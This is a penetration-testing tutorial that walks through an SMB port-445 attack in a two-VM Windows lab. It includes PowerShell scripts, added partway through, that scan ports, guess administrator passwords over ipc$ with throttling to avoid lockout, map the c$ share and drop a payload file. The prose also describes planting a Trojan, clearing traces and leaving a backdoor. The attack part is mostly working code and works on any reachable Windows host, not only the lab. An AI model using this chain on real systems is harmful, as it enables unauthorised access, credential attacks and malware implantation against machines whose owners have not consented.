Simple process of penetration test
2022-07-05 13:54:00 【Cwxh0125】
Simple process
One. Information gathering
nslookup, whois
Two. Vulnerability scanning
nmap over the IP range on port 80 (IIS, Apache: what the website runs on)
Advanced scanning: for example IIS vulnerability scanning, web application vulnerability scanning
Three. Exploitation
Four. Privilege escalation (shell environment, desktop environment, highest privilege)
Manually test whether a port is open: telnet IP port
Five. Clean up traces
Six. Leave yourself a way back in (backdoor)
Seven. Penetration test report
Practice
Open two virtual machines:
win2003 server 10.1.1.2
winxp workstation 10.1.1.1
Use XP to attack 2003.
First the two virtual machines must be able to talk to each other: configure their IPs in the same LAN.
After configuration, ping 2003 from XP once; the ping succeeds.
Next, the attack
Attack on port 445 (SMB file sharing port)
Step 1: Port scanning
Manual scanning
telnet IP port: if telnet connects (a blank screen rather than a "Could not open connection" error), the corresponding port is open
Automatic scanning: use scanport
You can see that both the XP and the 2003 virtual machine have port 445 open.
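The manual telnet check can be scripted. The PowerShell function below is an added example, not code from the original post: it makes a TCP connect attempt with a timeout, so a filtered port does not hang the scan the way telnet does on a dropped SYN. The two lab addresses come from the post; the port list and the 500 ms timeout are assumptions.

```powershell
# Added example, not from the original post: a TCP connect check with a
# timeout, replacing the manual "telnet IP port" step. The two lab addresses
# come from the post; the port list and the 500 ms timeout are assumptions.
function Test-TcpPort {
    param(
        [Parameter(Mandatory)] [string] $ComputerName,
        [Parameter(Mandatory)] [int]    $Port,
        [int] $TimeoutMs = 500
    )
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $async = $client.BeginConnect($ComputerName, $Port, $null, $null)
        # A filtered port never answers: give up after the timeout instead of
        # hanging the way telnet does when the SYN is silently dropped.
        if (-not $async.AsyncWaitHandle.WaitOne($TimeoutMs, $false)) { return $false }
        $client.EndConnect($async)   # throws on RST, i.e. a closed port
        return $true
    } catch {
        return $false
    } finally {
        $client.Close()
    }
}

# Lab hosts from the post: 10.1.1.1 (XP) and 10.1.1.2 (Win2003).
$targets = '10.1.1.1', '10.1.1.2'
$ports   = 80, 135, 139, 445          # web port plus the Windows RPC/NetBIOS/SMB set
foreach ($ip in $targets) {
    foreach ($port in $ports) {
        $state = if (Test-TcpPort -ComputerName $ip -Port $port) { 'open' } else { 'closed/filtered' }
        '{0}:{1,-4} {2}' -f $ip, $port, $state
    }
}
```

A connect scan completes the TCP handshake, so it shows up in the target's logs just like the telnet attempt; it only replaces the manual step, it does not make the scan quieter.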
One of the 445 attack vectors, ipc$:
net use connects your computer to a shared resource (establishes a drive mapping) or disconnects it from a shared resource (deletes a drive mapping). Run without options, it lists the computer's current connections.
1) Make a null session (empty connection):
net use \\IP\ipc$ "" /user:"" (be sure to note: this command contains 3 spaces; newer Windows versions reject null sessions by default)
2) Make an authenticated connection:
net use \\IP\ipc$ "password" /user:"username" (again 3 spaces)
3) Map a default (administrative) share:
net use z: \\IP\c$ "password" /user:"username" (maps the other side's C drive to your own Z drive; other drive letters work the same way; the account must be a local administrator, otherwise mapping c$ fails with access denied)
Once an ipc$ session to the target exists, you can reach any drive as IP + drive letter + $ without supplying the credentials again: net use z: \\IP\c$
4) Delete an ipc$ connection:
net use \\IP\ipc$ /del
5) Delete a share mapping:
net use z: /del deletes the mapped drive z: (other letters likewise)
net use * /del deletes all mappings; you are prompted to confirm with y
6) View the remote host's shared resources (the hidden default shares such as c$ and admin$ are not listed):
net view \\IP
Brute-force the system password over 445
Use the tool ntscan.
Once the user name and password are cracked, connect with net use \\IP\ipc$ "password" /user:"username". Note that password guessing against a domain account can lock it out; check the lockout policy before running a dictionary.
After connecting successfully, a backdoor can be left:
Make a Trojan
copy it to the target (implant the Trojan)
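The practice section above is one chain: confirm 445, get an ipc$ session, map c$, copy the file, and disconnect. The PowerShell script below is an added example, not code from the original post, that runs that chain against the lab Win2003 host with cleanup in a finally block. The target address comes from the post; the three candidate credentials, the payload path and the destination folder are assumptions. net.exe is invoked through Start-Process because Windows PowerShell drops an empty "" argument when net use is called directly, which would turn the blank-password attempt into an interactive password prompt.

```powershell
# Added example, not from the original post: the 445/ipc$ chain from the
# practice section run end to end against the lab Win2003 host, with the
# mappings torn down on the way out. Candidate credentials, payload path and
# destination folder are assumptions for this example.
$Target     = '10.1.1.2'
$Payload    = 'C:\lab\tool.exe'            # assumption: file to drop once c$ is mapped
$Candidates = @(                           # assumption: a short list, not ntscan's full dictionary
    @{ User = 'administrator'; Pass = '' },
    @{ User = 'administrator'; Pass = '123456' },
    @{ User = 'administrator'; Pass = 'password' }
)

function Invoke-NetUse {
    # Runs net.exe with the argument string passed through verbatim, so an
    # empty password still reaches net as "" (calling net use directly from
    # Windows PowerShell drops empty arguments). Returns net's exit code, 0 on success.
    param([string] $Arguments)
    $p = Start-Process -FilePath 'net.exe' -ArgumentList $Arguments -NoNewWindow -Wait -PassThru
    return $p.ExitCode
}

$session = $null
try {
    # 1) result of the port scan step: 445 must answer before anything else makes sense
    $tcp = New-Object System.Net.Sockets.TcpClient
    $tcp.Connect($Target, 445)             # throws if 445 is closed or filtered
    $tcp.Close()

    # 2) ipc$ connect with each candidate, stopping at the first one the server accepts.
    #    A domain account locks after a few failures: check the lockout policy first
    #    and keep the list short; bulk guessing ntscan-style can lock out every
    #    account it touches and is loud in the security log.
    foreach ($c in $Candidates) {
        $rc = Invoke-NetUse "use \\$Target\ipc`$ `"$($c.Pass)`" /user:`"$($c.User)`""
        if ($rc -eq 0) { $session = $c; break }
        Start-Sleep -Seconds 2             # throttle to stay under lockout thresholds
    }
    if (-not $session) { throw "no candidate accepted by $Target" }
    "ipc`$ session established as $($session.User)"

    # 3) enumerate shares (net view never lists the hidden c$/admin$ shares)
    net view "\\$Target"

    # 4) map c$ through the existing session and drop the file. Mapping c$ only
    #    works for an administrator; a plain user gets "System error 5" (access denied).
    if ((Invoke-NetUse "use Z: \\$Target\c`$") -ne 0) {
        throw 'mapping c$ failed: the account is not a local administrator'
    }
    Copy-Item -Path $Payload -Destination 'Z:\Windows\Temp\' -ErrorAction Stop
    "copied $Payload to \\$Target\c`$\Windows\Temp"
}
finally {
    # 5) remove the drive and the ipc$ session so no stale mapping points at the target
    $null = Invoke-NetUse 'use Z: /delete /y'
    $null = Invoke-NetUse "use \\$Target\ipc`$ /delete /y"
}
```

Step 4 reuses the session from step 2, which is why no password appears on the c$ mapping line; the two net use /delete calls in finally run even when an earlier step throws, so a failed attempt never leaves a mapped drive behind on the attacking machine.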